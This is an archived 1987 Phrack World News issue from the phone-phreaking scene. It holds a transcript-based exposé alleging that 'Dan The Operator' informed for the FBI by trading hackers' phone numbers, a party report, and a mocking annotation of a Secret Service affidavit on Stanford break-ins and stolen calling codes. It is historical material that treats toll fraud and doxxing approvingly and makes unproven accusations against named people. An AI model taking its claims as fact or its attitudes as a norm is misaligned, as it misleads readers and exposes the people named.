          ^*^                                                   ^*^
          PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN

Welcome to my final issue of Phrack World News.  Many people are wondering why
I am giving it up.  There are several reasons, but the most important is that
I will be going to college and will have little (if any) time for the
phreak/hack world or PWN.  I doubt I will even be calling any bulletin boards,
but I may make an occasional call to a few of my friends in the community.

The Phrack Inc. VMS is no longer in service and messages will not be received
there by anyone.  Phrack Inc. is now in the hands of Sir Francis Drake, Elric
Of Imrryr, and Shooting Shark.

:Knight Lightning
______________________________________________________________________________

Dan The Operator; Informant                                      July 27, 1986
~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'm going to assume that all of you have read PWN 14/2 and the details
surrounding SummerCon '87.

This article will feature information collected from our investigation and
quotes from the Noah Tape.

The tape actually has two parts.  The front side has part of an Alliance
Teleconference in which Noah attempted to gather information by engineering
hackers.  Side B contains 45 minutes of a conversation between Noah and John
Maxfield of BoardScan, in which Noah tried to engineer Maxfield into giving
him information on certain hackers by trading him information on other
hackers. All of this has been going on for a long time although we are unsure
as to how long and Noah was not exactly an informant for Maxfield, it was the
FBI.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Part One:  Noah Engineers his "friends"

The Alliance teleconference recording has about 7 people on it, but the only
people I recognized were Dan The Operator, Il Duce (Fiber Optic), Johnny
Rotten, and The Ninja.

The topics discussed (mostly by Noah) included;

   Bill From RNOC / Catch-22 / Doom Prophet / Force Hackers / John Maxfield
      Karl Marx / Legion of Doom / Lord Rebel / Neba / Phantom Phreaker
  Phucked Agent 04 / Silver Spy / SummerCon '87 / The Rebel / The Videosmith


Here is a look at some of the conversation;                     [Il Duce=Mark]

------------------------------------------------------------------------------
Noah:  SILVER SPY, you know him?
Mark:  Yeah, what about him?
Noah:  Yeah, Paul.

[This was done to make it look like Noah knew him and was his buddy.-KL]
------------------------------------------------------------------------------
Noah:  Anyway, is LORD REBEL part of LOD?
Mark:  He's not really.
Noah:  I didn't think so.
Mark:  Well, he is, he is sort of.
Noah:  Ah, well what does he know.
Mark:  Not much.
Noah:  Why do they care about him, he's just a pirate.

[Look at this dork!  First he tries to act like he knows everything and then
when he realizes he screwed up, he tries to insult LORD REBEL's abilities.-KL]
------------------------------------------------------------------------------
Noah:  Who else is part of LOD that I missed?
Mark:  I don't know who you would have heard of.
Noah:  I've pretty much heard of everyone, I just can't think of anyone else.

[Yeah Noah, you are a regular best friend with everyone in LOD.-KL]
------------------------------------------------------------------------------
Noah:  Want to give out LORD REBEL's number?
Mark:  Everybody knows it already.
Noah:  What is it?
Mark:  Which one?
Noah:  Both, all.
Mark:  Want do you want to know for, don't you have it?
Noah:  Never bothered getting them.  What do you got? Mark!
Mark:  Yeah.
Noah:  Do you have his number?
Mark:  Yeah.
Noah:  Well, what is it!?
Mark:  Why should I say?
Noah:  I dunno, you say everyone's got it.
Mark:  Yeah, so.
Noah:  So if everyone has it, you might as well give it to everybody.
Mark:  Not really, I wouldn't want to be the one to tell him that I gave out
       his number.
Noah:  Ok Mark, fine, it's no problem for me to get anyone's number.  I got
       VIDEOSMITH's and SILVER SPY's, no problem.  [Yeah right, see the other
       conversation with John Maxfield.-KL]
------------------------------------------------------------------------------
Noah:  CATCH-22 is supposed to be the most elite BBS in the United States.
       What do you think about that Mark?
Mark:  What?
Noah:  What do you think about that Mark?
Mark:  About what?
Noah:  About CATCH-22.
Mark:  What about it?
Noah:  (pause) Well.
Mark:  Its not the greatest board because it's not really that active.
Noah:  Right, but what do you think about it?  Alright, first off here, first
       off, first off, do you have KARL MARX's number?
Mark:  What?
Noah:  I doubt you have KARL MARX's phone number.
Mark:  Ask me if I really care.
Noah:  I'm just wondering if YOU DO.
Mark:  It's one thing to have all these people's numbers, it's another if you
       are welcome to call them.
Noah:  Yeah (pause), well are you?
Mark:  Why should I say?
Noah:  I dunno, I dunno.  I'm probably going to ask him anyways.

       [I don't think my ragging is even necessary in this excerpt.-KL]
------------------------------------------------------------------------------
Noah:  Here is what MAXFIELD says, "You got the hackers, and then you got the
       people who want to make money off the hackers."  Information shouldn't
       be free, you should find out things on your own.

    [Give me a break Noah, you are the BIGGEST leach I have ever seen -KL]
------------------------------------------------------------------------------
One final note to make about the Alliance conversations is that halfway
through, IL DUCE and DAN THE OPERATOR gave out BILL FROM RNOC's full name,
phone number, address, etc.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Part Two: Noah Engineers John Maxfield

 The list of topics discussed in this conversation is much longer;

      Arthur Dent / Ben Casey / Big Brother / Bill From RNOC / BoardScan
Captain Crunch / Celtic Phrost / Cheshire Catalyst / Doc Holiday / Easywriter
    Genghis Khan / Jenny Jaguar / Jester Sluggo / Karl Marx / Kerrang Khan
 Kloey Detect / Max Files / Noah Espert / Legion Of Doom / Legion of Hackers
   Lord Digital / Lord Rebel / Mark Tabas / Oryan QUEST / Phucked Agent 04
Phrack Inc. / Pirate's Hangout / Septic Tank / Sigmund Fraud / The Disk Jockey
       The Executioner / The Federation / The *414* Wizard / The Hobbit
  The Marauder The Safecracker / The Telecom Security Group / The Videosmith
       The Weasel / Tommy Hawk / Torture Chamber / Twilight Zone / Tuc
                          Violet Boregard / Zepplin


The following are the highlights of the conversation between DAN THE OPERATOR
and JOHN MAXFIELD.                                      [John Maxfield = John]
------------------------------------------------------------------------------
Noah:  Did you ever find VIDEOSMITH's number?
John:  No, matter of fact.  You know what it is, I've been on boards he's been
       on in the 215 NPA [possibly Atlantis], but well.
Noah:  But you don't have his number?
John:  Should I?
Noah:  He's fairly big, he knows his stuff.  I would think he'd be worth
       getting a number for.
John:  Doesn't do anything for me because you know, just having his number
       doesn't get him in trouble or anything.
Noah:  Oh, well I don't want him to get in trouble...he's a nice person.  So
       do you have LORD REBEL's phone number?
John:  What do you know about him?
Noah:  I think he's up in New York.
John:  914?
Noah:  Possibly 718, 212, possibly even 201. [Excuse me you dork.  The 201 NPA
       is in the state of New Jersey not New York.  What a loser Noah is. -KL]
John:  If you don't have a number on him I'll have to do an alphabetical
       search for him.  It takes a while.
Noah:  Well we could talk while it's going.  I think you're pretty
       interesting, you're not boring like I am.
John:  Well you're not boring to me as long as I keep getting people's phone
       numbers.  Bahahahahahahahahah Har har har.
Noah:  (Pause)(Pause)(Pause) Bahahahahahahaha.  Sheesh.
John:  Well let's see what it finds, there's a lot of Lords in there.
Noah:  He's part of LOD.
John:  Oh he's part of LOD!?
Noah:  Yeah.
John:  Well I might have him and I might not [What a profound statement -KL].
Noah:  He's not very active in LOD.

         [The search for LORD REBEL's information was a failure -KL]
------------------------------------------------------------------------------
Noah:  I got a question, I'm still trying to figure this out.  Are there
       people like me who just call you up like this?
John:  Yes there are.
Noah:  A lot?
John:  Enough.  You know it's funny, there's people that call up and there
       assholes and I'll just hang up on them.  There is other people that
       call up and well you know they try to feed me bullshit, but at least
       they aren't being jerks about it.
Noah:  You think I'm feeding you bullshit?
John:  I dunno, maybe you are or maybe you aren't.  What I'm saying is that
       there are people that behave like humans.  So there are a few that call
       in.

       You know when you're working with informants, you got different
       categories.  You got informants you can trust and you got informants
       that well hold on a second.  There are some informants, that they could
       tell me anything and I'd believe them.  Ok, because I know them.  Met
       them personally maybe or known the guy for 3 or 4 years, his
       information is always correct that sort of thing.

       Then there is somebody like you that umm is kinda maybe a "Class 2
       Informant."  Gives valid phone numbers and information out, but is not
       really a true informant.  Then there is a "Class 3 Informant" that's
       like, ahh somebody like ORYAN QUEST who calls up and turns in somebody
       he doesn't like, but that's all he ever does.  I don't know if you can
       call them Class 1, Class 2, Class 3 exactly but that's how I look at
       it.

   [Shortly after this, Maxfield gave out JESTER SLUGGO's information -KL]
------------------------------------------------------------------------------
Noah:  How about Phucked Agent 04?
John:  Oh him, his name is XXXXX and he's out in XXXXXXX.
Noah:  Something like that.
John:  He's one of the jerks that made death threats against me.  I kinda
       would like to get him.
Noah:  You want his number?
John:  Yeah.
Noah:  Lemme see if I can catch up with him, I know a few people in LOD.
------------------------------------------------------------------------------
[Noah tried to get information on KERRANG KHAN for a while and then started
asking about KARL MARX -KL]

Noah:  Ok, KARL MARX.
John:  Oh, he got busted along with MARK TABAS you know, I told you all about
       that.
Noah:  Yeah yeah.
John:  He lives out in NPA XXX, but he was going to college in XXXXXXXXXX and
       I don't have a number for him there.
Noah:  He's probably back home now.
John:  Yeah, but I probably shouldn't give out his number.  He did get popped.
Noah:  Aw come on.
John:  Nah.
Noah:  Come on.
John:  Nah.
Noah:  Please.
John:  Nah. I probably don't have a correct number anyway.
Noah:  Dude.  Well if you don't have a correct number then give me the old
       number.
John:  Nah.
Noah:  C'mon dude.
John:  Nah.
Noah:  Dude!
John:  Nah nah.  Besides I have a feeling that he wouldn't appreciate being
       called up by hackers anyway.
Noah:  He's still around though!
John:  Is he!?
Noah:  Yes.
John:  Oh really.
Noah:  Yes sir.  Because he was talking with THE MARAUDER, you know, Todd.
John:  Yeah?
Noah:  Yeah.
John:  That's interesting.

[They went on to discuss THE SAFECRAKER, THE SEPTIC TANK, THE TWILIGHT ZONE,
TORTURE CHAMBER, and THE FEDERATION.  Maxfield reveled that he had been on
TWILIGHT ZONE back when THE MARAUDER used to run it.  -KL]
------------------------------------------------------------------------------
Noah:  THE MARAUDER is still home, he didn't go to college.
John:  Yeah, MARAUDER, now he is heavy duty.
Noah:  Yeah, he knows his snit (not a typo).  However, he doesn't brag about
       it.
John:  Well the thing is, you know is what the hell is he trying to
       accomplish? I sometimes kinda wonder what motivates somebody like that.
Noah:  What do you mean?
John:  Well he wants to screw around with all this stuff, but what's the
       point?
------------------------------------------------------------------------------
SIGMUND FRAUD, MAX FILES, TOMMY HAWK, TUC, PHRACK INC., MARK TABAS, were next
to be discussed.  After which MAXFIELD went on to retell a story about a
district attorney in California that referred to him as a legend in his own
time.  Noah then started asking about CAPTAIN CRUNCH and Easywriter, and
Maxfield told him the story of CAPTAIN CRUNCH's latest bust.
------------------------------------------------------------------------------
THE DISK JOCKEY, DOC HOLIDAY, THE MARAUDER, BIG BROTHER, ARTHUR DENT, THE
WEASEL, BILL FROM RNOC, THE 414 WIZARD, THE EXECUTIONER, and LORD DIGITAL were
next.

Then it was Noah's turn to unload (although Noah had already given out
information on many of the previously mentioned people).

TUC, THE TELECOM SECURITY GROUP, CELTIC PHROST, ZEPPLIN, and GENGHIS KHAN had
their information handed out freely.

John:  I guess I'm going to have the goons come over and pay you a visit.
Noah:  Who me?
John:  Take your computer, clean your room for you.
Noah:  No, no, please... don't... you can't do that.  I'll be an informant
       dammit.  I'll give you all my files, I'll send them immediately...
       Federal Express.
John:  Sounds good.
Noah:  Has anyone ever really done that?
John:  Well not by Federal Express.
Noah:  I'll send you all my manuals, everything.  I'll even tell you my
       favorite Sprint code.
John:  Sprint would appreciate that.  You know, it's interesting that you know
       MARAUDER.
Noah:  Todd and I, yeah, well we're on a first name basis.  [Yeah you know his
       first name but that's as far as it goes, isn't it Noah. -KL]
------------------------------------------------------------------------------
Noah gave out more people's information and the conversation ran on for
another 20 minutes.  The problem is that this is when the tape ran out, but
the conversation was going strong.  Noah was giving out numbers alphabetically
and he was still in the C-G area when the tape ran out.  There is no telling
as to what was discussed next.

All of the people mentioned at the beginning were discussed in depth and the
excerpts shown here do not necessarily show the extent of the discussion.  I
didn't transcript the entire conversation because in doing so would publicly
release information that would be unproductive to our society.

So, many of you are probably still asking yourself, where did we get the FBI
connection from?  Well, some time ago, DAN THE OPERATOR used to hang out with
THE TRADER and they were into some kind of stock fraud using Bank Americard or
something along those lines.  Something went wrong and Noah was visited by the
FBI.  As it turns out, Noah became their informant and they dropped the
charges.

Sometime later, Noah tried to set up TERMINUS (see the current Phrack
Pro-Phile) to meet (unknowingly) with the FBI and give them a tour of his
board,  TERMINUS realized what was going on and Noah's plans were ruined.

I hope you learned from this story, don't let yourself be maneuvered by people
like Noah.  There are more informants out there than you think.

                         Written by Knight Lightning

For more information about DAN THE OPERATOR, you should read THE SYNDICATE
REPORTS Transmittal No. 13 by THE SENSEI.  Available on finer BBSes/AEs
everywhere.
______________________________________________________________________________



--------------------------------------------------------------------------------


PartyCon '87                                                  July 24-26, 1987
~~~~~~~~~~~~
This article is not meant to be as in depth as the SummerCon issue, but I
think you'll enjoy it.

Before we begin, here is a list of the total phreak/hack attendees;

      Cheap Shades / Control C / Forest Ranger / Knight Lightning / Loki
     Lucifer 666 / Mad Hatter / Sir William / Synthetic Slug / Taran King
               The Cutthroat / The Disk Jockey / The Mad Hacker

Other people who attended that should be made a note of include; Dan and Jeff
(Two of Control C's roommates that were pretty cool), Dennis (The Menace); one
of Control C's neighbors, Connie; The Mad Hacker's girlfriend (at the time
anyway), and the United States Secret Service; they weren't actually at
PartyCon, but they kept a close watch from a distance.

For me, it started Friday morning when Cheap Shades and I met Forest Ranger
and Taran King at Taran's house.  Our trip took us through Illinois, and we
stopped off at a Burger King in Normal, Illinois (close to Illinois State
University). Would you believe that the majority of the population there had
no teeth?

Anyway, our next stop was to see Lucifer 666 in his small one-horse town.  He
would follow us later (with Synthetic Slug).  We arrived at Control C's
apartment around 4 PM and found Mad Hatter alone.  The first thing he made a
note of was some sheets of paper he discovered (while searching ^C's
apartment).  I won't go into what was on the paper.  Although we didn't know
it at the time, he copied the papers and hid them in his bag.  It is believed
that he intended to plant this and other information inside the apartment so
that ^C would get busted.

Basically, it was a major party with a few mishaps like Forest Ranger and
Cheap Shades driving into Grand Rapids, Michigan on Friday night and not
getting back till 4 AM Saturday.  We hit Lake Shore Drive, the beach, a few
shopping malls, Chicago's Hard Rock Cafe, and Rush Street.  It was a lot of
fun and we may do it again sometime soon.

If you missed PartyCon '87, you missed out.  For those who wanted to go, but
couldn't find us, we're sorry.  Hotel cancellations and loss of phone lists
due to current problems made it impossible for us to contact everyone.

                         Written by Knight Lightning
______________________________________________________________________________



--------------------------------------------------------------------------------


                      #### PHRACK PRESENTS ISSUE 15 ####

                   ^*^*^*^Phrack World News, Part 1^*^*^*^

                            **** File 8 of 10 ****



SEARCH WARRANT ON WRITTEN AFFIDAVIT

DATE:  7/17/87

TO:  Special Agent Lewis F. Jackson II, U.S. Secret Service or any agent d use
     of access devices, and Title 18 USC 1030 - Computer related fraud.

WHEN:  On or before (10 days) at any time day or night

------------

AFFIDAVIT

   "I, Lewis F. Jackson II, first being duly sworn, do depose and state:..."

[Here he goes on and on about his position in the San Jose Secret Service,
classes he has taken (none of them having to do with computers)]

   "Other individuals involved in the investigation:

    Detective J. McMullen -  Stanford Public Safety/Specialist in computers
    Steve Daugherty       -  Pacific Bell Telephone (sic)/ Specialist in fraud
    Stephen Hansen        -  Stanford Electrical Eng./ Director
    Brian Bales           -  Sprint Telecom./ Security Investigator
    M. Locker             -  ITT Communications/ Security Investigator
    Jerry Slaughter       -  MCI Communications/Security Investigator

4.  On 11/14/86, I met with Detective Sgt. John McMullen, who related the
following:

      a.  Beginning on or about 9/1/86, an unknown suspect or group of
suspects using the code name Pink Floyd repeatedly accessed the Unix and
Portia computer systems at Stanford University without authorization.

      b.  The suspects initially managed to decode the password of a computer
user called "Laurent" and used the account without the permission or knowledge
of the account holder.  The true account holder was given a new account
and a program was set up to print out all activity on the "Laurent" account.

       c & d.  Mentions the systems that were accessed illegally, the most
'dangerous' being Arpanet (geeeee).

       e.  Damage was estimated at $10,000 by Director of Stanford Computers.

       g.  On 1/13/87, the suspect(s) resumed regular break-ins to the
"Laurent" account, however traps and traces were initially unsuccessful in
identifying the suspect(s) because the suspect(s) dialed into the Stanford
Computer System via Sprint or MCI lines, which did not have immediate trap and
trace capabilities.

6.  On 2/19/87 I forwarded the details of my investigation and a request for
collateral investigation to the New York Field Office of The U.S. Secret
Service.  (The USSS [I could say something dumb about USSR here]).  SA Walter
Burns was assigned the investigation.

7.  SA Burns reported telephonically that comparison of the times at which
Stanford suffered break ins [aahhh, poor Stanford] with that of DNR's on
suspects in New York, Pennsylvania, Massachusetts, Maryland and California
showed a correlation.

8.  [Some stuff about Oryan QUEST engineering Cosmos numbers].

9.  On 4/2/87, I was telephoned again by Mr. Daugherty who reported that on
4/1/87, while checking a trouble signal on the above DNR's [on Oryan's lines],
he overheard a call between the central figure in the New York investigation
and [Oryan Quest's real name.]  Mr. Daughtery was able to identify and
distinguish between the three suspects because they addressed each other by
there first name.  During the conversation,  [Oryan Quest] acknowledged being
a member of L.O.D. (Legion Of Doom), a very private and exclusive group of
computer hackers.  [Oryan QUEST never was a member.]

10.  [Mr. Daughtery continued to listen while QUEST tried to engineer some
stuff.  Gee what a coincidence that a security investigator was investigating
a technical problem at the same time a conversation with 2 of the suspects was
happening, and perhaps he just COULDN'T disconnect and so had to listen in for
20 minutes or so.  What luck.]

11.  SA Burns reported that the suspects in New York regularly called the
suspects in California.

14.  From 4/30/87 to 6/15/87 DNR's were on both California suspects and were
monitored by me.

[The data from the DNR's was 'analyzed' and sent to Sprint, MCI, and ITT to
check on codes.  Damages claimed by the various LDX's were:

SPRINT   :  Oryan QUEST   : 3 codes for losses totaling $4,694.72
            Mark Of CA    : 2 codes for losses totaling $1,912.57

ITT      :  Mark Of CA    : 4 codes for losses totaling $639

MCI      :  Mark Of CA    : 1 code for losses totaling $1,813.62

And the winner is....Oryan QUEST at $4,694.72 against Mark with $4,365.19.]

20.  Through my training and investigation I have learned that people who
break into computers ("hackers") and people who fraudulently obtain
telecommunications services ("freakers") are a highly sophisticated and close
knit group.  They routinely communicate with each other directly or through
electronic bulletin boards.

     [Note:  When a Phrack reporter called Lewis Jackson and asked why after
his no doubt extensive training he didn't spell "freakers" correctly with a
'ph' he reacted rather rudely.]

21.
22. [Jackson's in depth analysis of what hackers have ("Blue Boxes are
23.     normally made from pocket calculators...") and their behavior]
24.

26.  Through my training and investigations, I have learned that evidence
stored in computers, floppy disks, and speed dialers is very fragile and can
be destroyed in a matter of seconds by several methods including but not
limited to:  striking one or more keys on the computer keyboard to trigger a
preset computer program to delete information stored within, passing a strong
magnetic source in close proximity to a computer, throwing a light switch
designed to either trigger a preset program or cut power in order to delete
information stored in a computer or speed dialer or computer; or simply
delivering a sharp blow to the computer.  [Blunt blows don't cut it.]

27.  Because of the ease with which evidence stored in computers can be
destroyed or transferred, it is essential that search warrants be executed at
a time when the suspect is least likely to be physically operating the target
computer system and least likely to have access to methods of destroying or
transferring evidence stored within the system.  Because of the rapidity of
modern communications and the ability to destroy or transfer evidence remotely
by one computer to another, it is also essential that in cases involving
multiple suspects, all search warrants must be executed simultaneously.



--------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы